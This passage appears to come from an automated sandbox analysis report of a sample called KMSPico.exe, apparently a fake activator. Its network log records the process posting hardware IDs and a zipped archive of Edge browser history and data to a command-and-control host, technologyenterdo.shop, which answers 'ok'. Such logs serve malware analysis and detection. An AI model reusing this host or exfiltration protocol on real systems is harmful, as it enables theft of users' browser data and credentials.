                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s%2BXaj8DwFXbDX35J5yU9kZfAZwuUb5xhXKvu%2BvoQ3M3HQiO%2FMD0eRgg1tBkJq3FvzoxRyc2EvTnPMp8akh80%2FcNDPPUjaDY8jMbPJ9ALfF4yBTSEVUbFMlufDwVUDTp3Eiyix209dFtk"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce60bb8f18c5d-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:54 UTC  563                IN         Data Raw: 34 63 31 38 0d 0a 72 71 49 6a 48 77 51 42 30 4a 6c 2f 4c 7a 46 41 32 69 42 6c 4e 69 6a 72 6c 31 79 46 42 77 31 68 5a 39 50 2f 6c 44 73 75 57 35 6e 56 72 79 6b 2f 4a 43 48 77 75 77 6b 4e 43 32 44 75 44 47 67 38 43 4d 75 33 66 4b 64 30 61 45 4e 64 38 34 76 6d 54 6b 74 33 6c 4b 53 43 41 7a 38 6b 49 37 48 39 58 52 55 52 4a 72 74 4d 46 6c 4d 45 35 70 31 38 70 53 63 74 51 77 4b 72 33 61 34 62 64 56 61 54 6a 6f 49 44 50 79 51 68 71 35 52 31 44 78 46 67 2b 67 42 46 46 67 6a 4a 38 6a 4b 6e 50 53 31 44 41 72 6d 64 39 56 64 4d 4f 76 4c 42 30 6b 39 38 62 47 32 33 38 52 70 4d 56 53 47 32 54 51 42 54 54 59 72 39 4d 75 78 71 5a 51 78 46 2f 2f 4b 65 47 77 35 37 75 59 36 43 41 7a 38 6d 5a 4b 71 37 52 51 38 54 44 62 39 55 42 48 74 4a 6d 50 78 2b 69 41 30 74 51 55 66 7a 33
                                    Data Ascii: 4c18rqIjHwQB0Jl/LzFA2iBlNijrl1yFBw1hZ9P/lDsuW5nVryk/JCHwuwkNC2DuDGg8CMu3fKd0aENd84vmTkt3lKSCAz8kI7H9XRURJrtMFlME5p18pSctQwKr3a4bdVaTjoIDPyQhq5R1DxFg+gBFFgjJ8jKnPS1DArmd9VdMOvLB0k98bG238RpMVSG2TQBTTYr9MuxqZQxF//KeGw57uY6CAz8mZKq7RQ8TDb9UBHtJmPx+iA0tQUfz3
                                    2024-02-29 00:47:54 UTC  1369               IN         Data Raw: 45 70 76 5a 6e 47 30 39 68 68 66 56 53 65 32 53 41 52 47 51 49 66 7a 50 65 35 75 5a 67 59 43 74 64 32 34 4e 69 52 37 75 59 36 43 41 7a 38 6b 49 66 4c 38 42 51 30 4c 59 50 68 6a 43 6c 39 47 67 2b 49 2b 70 77 6f 48 51 55 66 7a 33 37 51 62 55 33 65 55 70 49 49 44 50 79 51 68 38 4f 4a 79 4a 52 46 67 2b 67 42 46 46 67 6a 4c 74 54 6e 72 4a 54 64 42 52 62 57 63 38 6c 68 49 4e 2f 58 49 7a 45 64 7a 61 32 79 30 38 52 31 4b 57 53 71 77 51 77 70 66 52 59 6e 77 4d 2b 4e 6a 59 77 49 41 38 64 4f 5a 4d 51 35 37 75 59 36 43 41 7a 38 6b 49 37 58 6a 58 52 55 52 59 70 5a 46 42 45 59 49 76 50 59 77 36 57 4a 35 51 32 72 5a 33 37 51 62 44 6e 75 35 30 34 34 75 46 53 51 68 38 4c 6c 66 44 30 70 4e 30 41 42 46 46 67 6a 4c 74 33 79 6c 4a 57 67 50 52 65 6e 66 74 6c 64 4a 4e 75 6e 4e
                                    Data Ascii: EpvZnG09hhfVSe2SARGQIfzPe5uZgYCtd24NiR7uY6CAz8kIfL8BQ0LYPhjCl9Gg+I+pwoHQUfz37QbU3eUpIIDPyQh8OJyJRFg+gBFFgjLtTnrJTdBRbWc8lhIN/XIzEdza2y08R1KWSqwQwpfRYnwM+NjYwIA8dOZMQ57uY6CAz8kI7XjXRURYpZFBEYIvPYw6WJ5Q2rZ37QbDnu5044uFSQh8LlfD0pN0ABFFgjLt3ylJWgPRenftldJNunN
                                    2024-02-29 00:47:54 UTC  1369               IN         Data Raw: 6b 4c 38 4c 6c 66 44 78 46 67 2b 67 42 48 55 31 4c 4a 72 58 79 6e 54 32 77 58 42 72 76 66 77 31 70 43 4e 2f 7a 61 67 43 34 56 4a 43 48 77 75 56 38 50 54 47 7a 58 4b 6b 55 57 43 4d 75 33 66 50 34 4b 42 30 46 48 38 39 2b 30 47 77 35 37 75 38 76 4d 41 53 55 6b 49 37 2f 36 46 55 74 42 4c 62 56 42 43 56 70 46 6a 50 6f 32 35 32 56 69 42 67 47 36 6c 76 56 55 53 43 76 78 7a 4d 68 45 66 47 78 70 38 72 56 79 4a 52 46 67 2b 67 42 46 46 67 6a 4c 74 54 6e 2f 4a 54 64 42 52 59 43 4b 2f 52 74 35 4f 76 58 43 78 31 63 39 43 51 76 77 75 56 38 50 45 57 43 6e 44 47 67 38 43 4d 75 33 66 4b 55 6e 64 6d 78 74 38 39 2b 30 47 77 35 37 75 59 36 41 52 6e 45 6d 4f 2f 43 37 45 45 56 57 4a 37 64 44 44 56 70 50 67 2f 6b 32 36 57 5a 39 44 41 47 78 6b 66 35 54 51 54 66 2f 78 4d 6c 4b 64
                                    Data Ascii: kL8LlfDxFg+gBHU1LJrXynT2wXBrvfw1pCN/zagC4VJCHwuV8PTGzXKkUWCMu3fP4KB0FH89+0Gw57u8vMASUkI7/6FUtBLbVBCVpFjPo252ViBgG6lvVUSCvxzMhEfGxp8rVyJRFg+gBFFgjLtTn/JTdBRYCK/Rt5OvXCx1c9CQvwuV8PEWCnDGg8CMu3fKUndmxt89+0Gw57uY6ARnEmO/C7EEVWJ7dDDVpPg/k26WZ9DAGxkf5TQTf/xMlKd
                                    2024-02-29 00:47:54 UTC  1369               IN         Data Raw: 35 58 77 38 52 59 50 6f 41 52 31 4e 47 79 61 31 38 70 32 5a 72 41 77 53 78 6c 65 52 5a 58 6a 33 34 79 73 35 49 63 6d 78 73 73 2f 55 58 52 46 51 6c 74 55 51 49 56 30 57 49 38 54 44 6d 4a 53 46 73 62 66 50 66 74 42 73 4f 65 37 6d 4f 67 45 5a 6c 4a 6a 76 77 75 7a 4a 4f 52 53 6a 34 4c 57 38 57 43 4d 75 33 66 4b 56 36 49 57 78 74 38 39 2b 30 47 77 35 37 34 71 4f 6f 41 7a 38 6b 49 66 43 35 58 77 38 54 4a 62 51 43 58 78 59 4b 67 2f 6b 36 35 47 6c 6d 44 77 69 77 6d 66 46 55 53 44 6e 39 79 73 56 41 64 6d 35 76 76 66 45 52 53 56 38 72 76 6b 34 45 56 30 7a 4a 75 31 47 50 4a 79 31 42 52 2f 50 66 74 42 73 4d 50 75 4f 4d 6d 41 4d 39 52 32 36 35 39 78 31 4f 51 69 58 34 4c 57 38 57 43 4d 75 33 66 4b 56 36 49 57 78 74 38 39 2b 30 47 77 35 37 34 71 4f 6f 41 7a 38 6b 49 66
                                    Data Ascii: 5Xw8RYPoAR1NGya18p2ZrAwSxleRZXj34ys5Icmxss/UXRFQltUQIV0WI8TDmJSFsbfPftBsOe7mOgEZlJjvwuzJORSj4LW8WCMu3fKV6IWxt89+0Gw574qOoAz8kIfC5Xw8TJbQCXxYKg/k65GlmDwiwmfFUSDn9ysVAdm5vvfERSV8rvk4EV0zJu1GPJy1BR/PftBsMPuOMmAM9R2659x1OQiX4LW8WCMu3fKV6IWxt89+0Gw574qOoAz8kIf
                                    2024-02-29 00:47:54 UTC  1369               IN         Data Raw: 45 57 44 36 41 45 56 4e 4a 65 47 33 66 4b 55 6e 4c 55 46 48 38 39 33 78 56 51 78 68 75 59 7a 4d 53 48 74 67 5a 72 37 36 47 30 56 57 4b 72 78 44 41 56 4a 4a 68 76 45 37 35 6d 70 72 44 77 75 37 6e 50 64 56 52 7a 62 77 79 59 41 50 45 67 34 68 38 4c 6c 66 44 78 46 67 2b 67 49 41 54 41 72 52 74 33 37 57 5a 6e 6b 55 46 62 33 64 6d 54 45 4f 65 37 6d 4f 67 67 4e 69 4b 41 7a 61 75 56 38 50 45 57 44 36 57 32 67 38 43 4d 75 33 66 4b 55 6e 4c 55 46 46 74 70 47 32 41 51 35 35 2b 74 37 4b 53 33 4e 6a 62 4c 66 34 45 6b 70 65 4a 4c 52 49 44 6c 78 4d 68 76 77 73 35 47 6c 68 42 41 75 39 6b 2f 74 54 54 7a 53 37 67 71 38 70 50 79 51 68 38 4c 6c 66 44 78 46 69 76 31 70 48 44 41 6a 4a 32 54 6e 71 53 32 51 50 41 76 48 79 6e 68 73 4f 65 37 6d 4f 67 6c 34 7a 43 51 76 77 75 56 38
                                    Data Ascii: EWD6AEVNJeG3fKUnLUFH893xVQxhuYzMSHtgZr76G0VWKrxDAVJJhvE75mprDwu7nPdVRzbwyYAPEg4h8LlfDxFg+gIATArRt37WZnkUFb3dmTEOe7mOggNiKAzauV8PEWD6W2g8CMu3fKUnLUFFtpG2AQ55+t7KS3NjbLf4EkpeJLRIDlxMhvws5GlhBAu9k/tTTzS7gq8pPyQh8LlfDxFiv1pHDAjJ2TnqS2QPAvHynhsOe7mOgl4zCQvwuV8
                                    2024-02-29 00:47:54 UTC  1369               IN         Data Raw: 67 42 46 46 67 6a 4c 74 33 37 67 61 53 39 62 52 2f 47 5a 2f 46 6c 42 4d 2f 44 44 77 30 5a 7a 5a 6d 36 34 36 52 56 4e 55 79 79 2b 51 77 74 52 53 34 58 32 4c 4f 74 6a 59 67 55 4e 6f 39 32 34 4e 69 52 37 75 59 36 43 41 7a 38 6b 49 66 4c 38 42 51 30 4c 59 50 68 69 44 46 68 4a 68 66 51 35 30 6d 5a 68 44 51 4b 6e 33 5a 6b 78 44 6e 75 35 6a 6f 49 44 59 69 67 49 33 5a 4e 32 44 78 45 37 31 79 70 46 46 67 6a 4c 74 33 79 6c 4a 79 38 45 43 66 48 46 74 42 6c 42 4e 66 48 42 78 55 56 31 59 57 43 7a 39 78 6c 41 58 69 61 78 52 67 4a 47 57 49 2f 37 50 75 68 72 59 41 38 58 76 35 6a 32 56 51 78 33 6c 4b 53 43 41 7a 38 6b 49 66 43 35 58 77 31 55 4f 76 67 61 52 52 52 37 6e 76 56 2b 69 41 30 74 51 55 66 7a 33 37 52 47 41 6c 4b 55 70 4b 38 70 46 69 51 68 71 35 52 31 44 78 46 67
                                    Data Ascii: gBFFgjLt37gaS9bR/GZ/FlBM/DDw0ZzZm646RVNUyy+QwtRS4X2LOtjYgUNo924NiR7uY6CAz8kIfL8BQ0LYPhiDFhJhfQ50mZhDQKn3ZkxDnu5joIDYigI3ZN2DxE71ypFFgjLt3ylJy8ECfHFtBlBNfHBxUV1YWCz9xlAXiaxRgJGWI/7PuhrYA8Xv5j2VQx3lKSCAz8kIfC5Xw1UOvgaRRR7nvV+iA0tQUfz37RGAlKUpK8pFiQhq5R1DxFg
                                    2024-02-29 00:47:54 UTC  1369               IN         Data Raw: 52 70 6e 75 55 7a 70 77 6f 48 51 55 66 7a 33 37 51 62 55 33 65 55 70 49 49 44 50 79 51 68 38 4f 4a 79 4a 52 46 67 2b 67 42 46 46 67 6a 4c 74 54 6e 72 4a 54 64 42 52 62 6d 51 2f 6c 4e 49 50 76 62 4c 78 6b 68 76 62 32 61 38 2b 78 6c 47 58 43 53 38 51 51 64 47 54 49 33 39 50 65 70 6f 59 51 41 42 38 64 4f 5a 4d 51 35 37 75 59 36 43 41 7a 38 6b 49 37 58 6a 58 52 55 52 59 6f 70 50 43 55 39 46 6a 75 51 30 70 77 6f 48 51 55 66 7a 33 37 51 62 55 33 65 55 70 49 49 44 50 79 51 68 38 4f 4a 79 4a 52 46 67 2b 67 42 46 46 67 6a 4c 74 54 6e 72 4a 54 64 42 52 62 57 54 35 46 4a 4e 4d 76 44 43 78 30 35 34 62 47 4f 39 2f 78 35 44 57 43 4f 37 53 67 70 5a 52 49 50 38 4e 2b 42 70 61 77 52 46 2f 2f 4b 65 47 77 35 37 75 59 36 43 41 7a 38 6d 5a 4b 71 37 52 51 38 54 43 5a 6c 76 4b
                                    Data Ascii: RpnuUzpwoHQUfz37QbU3eUpIIDPyQh8OJyJRFg+gBFFgjLtTnrJTdBRbmQ/lNIPvbLxkhvb2a8+xlGXCS8QQdGTI39PepoYQAB8dOZMQ57uY6CAz8kI7XjXRURYopPCU9FjuQ0pwoHQUfz37QbU3eUpIIDPyQh8OJyJRFg+gBFFgjLtTnrJTdBRbWT5FJNMvDCx054bGO9/x5DWCO7SgpZRIP8N+BpawRF//KeGw57uY6CAz8mZKq7RQ8TCZlvK
                                    2024-02-29 00:47:54 UTC  1369               IN         Data Raw: 6e 66 71 6b 4b 42 30 46 48 38 39 2b 30 47 77 35 37 75 38 76 59 41 53 55 6b 49 35 6a 67 48 45 42 66 59 4a 5a 4a 45 56 4d 49 71 50 73 31 34 47 6c 35 51 32 72 5a 33 37 51 62 44 6e 75 35 30 34 34 75 46 53 51 68 38 4c 6c 66 44 30 70 4e 30 41 42 46 46 67 6a 4c 74 33 79 6c 4a 57 67 50 52 65 6e 66 74 6c 42 43 4e 66 6a 4c 79 45 6c 34 5a 6d 69 79 39 42 64 44 56 44 43 79 54 67 31 47 52 59 72 34 4f 75 70 76 61 67 6f 58 74 4a 54 77 47 51 4a 57 6b 34 36 43 41 7a 38 6b 49 66 43 35 58 55 70 4c 59 75 41 41 52 32 78 42 68 38 63 39 2f 43 55 41 61 30 66 7a 33 37 51 62 44 69 61 31 6f 36 67 44 50 79 51 68 38 4c 6b 45 49 6a 74 67 2b 67 42 46 46 67 6a 4c 74 33 37 67 61 53 39 62 52 2f 47 65 38 56 70 4e 4d 2f 4c 41 7a 30 5a 35 64 47 6d 31 36 52 78 4d 57 43 2b 30 51 67 70 5a 51 49
                                    Data Ascii: nfqkKB0FH89+0Gw57u8vYASUkI5jgHEBfYJZJEVMIqPs14Gl5Q2rZ37QbDnu5044uFSQh8LlfD0pN0ABFFgjLt3ylJWgPRenftlBCNfjLyEl4Zmiy9BdDVDCyTg1GRYr4OupvagoXtJTwGQJWk46CAz8kIfC5XUpLYuAAR2xBh8c9/CUAa0fz37QbDia1o6gDPyQh8LkEIjtg+gBFFgjLt37gaS9bR/Ge8VpNM/LAz0Z5dGm16RxMWC+0QgpZQI
                                    2024-02-29 00:47:54 UTC  1369               IN         Data Raw: 63 32 55 59 52 64 37 31 74 42 73 4f 65 37 6d 4f 33 77 38 53 44 69 48 77 75 56 38 50 45 54 76 58 4b 6b 55 57 43 4d 75 33 66 4b 55 6e 4c 77 51 4a 38 63 57 30 47 55 45 2b 39 63 54 47 54 33 74 30 62 37 33 39 48 55 78 5a 4c 37 52 4a 41 46 70 42 6a 2f 41 7a 35 32 4e 70 42 77 47 31 6b 2f 55 5a 41 6c 61 54 6a 6f 49 44 50 79 51 68 38 4c 6c 64 53 6b 74 69 34 41 42 48 63 32 65 34 74 78 33 77 63 32 55 45 43 61 65 57 39 31 70 61 4e 4f 75 4d 72 79 6b 2f 4a 43 48 77 75 56 39 53 48 55 33 51 41 45 55 57 43 4d 75 33 4a 34 67 4e 4c 55 46 48 38 39 2b 30 47 77 35 35 2f 4d 43 41 47 54 38 6d 61 4c 7a 2b 48 45 46 5a 4a 62 5a 51 42 6c 35 47 69 50 49 35 37 48 64 6b 45 51 36 35 6e 76 68 52 52 54 6e 31 7a 4d 46 4d 66 53 59 74 33 5a 4e 66 44 78 46 67 2b 67 42 46 46 67 71 4f 37 58 36
                                    Data Ascii: c2UYRd71tBsOe7mO3w8SDiHwuV8PETvXKkUWCMu3fKUnLwQJ8cW0GUE+9cTGT3t0b739HUxZL7RJAFpBj/Az52NpBwG1k/UZAlaTjoIDPyQh8LldSkti4ABHc2e4tx3wc2UECaeW91paNOuMryk/JCHwuV9SHU3QAEUWCMu3J4gNLUFH89+0Gw55/MCAGT8maLz+HEFZJbZQBl5GiPI57HdkEQ65nvhRRTn1zMFMfSYt3ZNfDxFg+gBFFgqO7X6


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                    2           192.168.2.5  49706        104.21.80.118   443               3648  C:\Users\user\Desktop\KMSPico.exe
                                    Timestamp                Bytes transferred  Direction  Data
                                    2024-02-29 00:47:54 UTC  288                OUT        POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 13678
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:54 UTC  13678              OUT        Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:47:55 UTC  804                IN         HTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=3s082lojd91cbuhvuhro4eu0ln; expires=Sun, 23-Jun-2024 18:34:34 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6S9fPQHUxG4oLi1lWBDBegaFp5ZHJ3hVmVlML0HiY0TgPsc4sg2St75%2FJ5ljns7nK6FxwJQ9UYpOWCl66spe6V4g%2FJjxAesPo0g1tPcoNHwYjfNJ3rj7r6nUR%2FTi789xPuyfDxRwT7w5"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce610fd7f1977-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:55 UTC  23                 IN         Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215
                                    2024-02-29 00:47:55 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                    3           192.168.2.5  49707        104.21.80.118   443               3648  C:\Users\user\Desktop\KMSPico.exe
                                    Timestamp                Bytes transferred  Direction  Data
                                    2024-02-29 00:47:56 UTC  288                OUT        POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 16221
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:56 UTC  15331              OUT        Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:47:56 UTC  890                OUT        Data Raw: 22 00 01 01 1a 6c 65 76 65 6c 64 62 2e 42 79 74 65 77 69 73 65 43 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 18 4d 89 51 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 1f 06 f1 34 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 00 00 00 45 64 67 65 2f 44 65 66 61 75 6c 74 2f 48 69 73 74 6f 72 79 50 4b 01 02 00 00 14 00 08 08
                                    Data Ascii: "leveldb.BytewiseComparatorPKP{.)PKMQEdge/BrowserVersion.txtPK4% WEdge/dp.txtPKA`Edge/Default/HistoryPK
                                    2024-02-29 00:47:56 UTC  808                IN         HTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=aniec5svtejh9ut864vghagt6a; expires=Sun, 23-Jun-2024 18:34:35 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LnNojuVH7%2F1TTgP3w3Ft0f0bvy%2F9Zu4NNqGIkBoiyS2EPxaO5rYwyTWoA0wYXQ0DP4Mr%2FqXSM%2B0Va%2BqeSfI6v3MJ8iwq0qlfIlyYynmwGnS6kYv1vVdAmHdDYMmjUhKCJKy8Yzblimis"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce6176e117ca5-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:56 UTC  23                 IN         Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215
                                    2024-02-29 00:47:56 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                    4           192.168.2.5  49708        104.21.80.118   443               3648  C:\Users\user\Desktop\KMSPico.exe
                                    Timestamp                Bytes transferred  Direction  Data
                                    2024-02-29 00:47:56 UTC  288                OUT        POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 20565
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:56 UTC  15331              OUT        Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:47:56 UTC  5234               OUT        Data Raw: cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb
                                    Data Ascii: 6vMMZh'F3Wun 4F([:7s~X`nO
                                    2024-02-29 00:47:57 UTC  810                IN         HTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=dkqg73hcobsr6g3la8pfr55ug1; expires=Sun, 23-Jun-2024 18:34:36 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WAdWd58A8bbQkqpYc3Spjv6jLJ8NVSSnFL9zKc6SjMOx4WBjLxcrZX%2F8%2BWL4YjjjJvvMXQ8hbehUvGxCGu1SBwzCgyQn8%2BUuE%2BEFDmcHLlsQgaQgJN%2BwJdM5rS0MQ7Mk9%2F96KtYLU7xB"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce61d6c1d0f4d-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:57 UTC  23                 IN         Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215
                                    2024-02-29 00:47:57 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                    5           192.168.2.5  49709        104.21.80.118   443               3648  C:\Users\user\Desktop\KMSPico.exe
                                    Timestamp                Bytes transferred  Direction  Data
                                    2024-02-29 00:47:59 UTC  287                OUT        POST /api HTTP/1.1
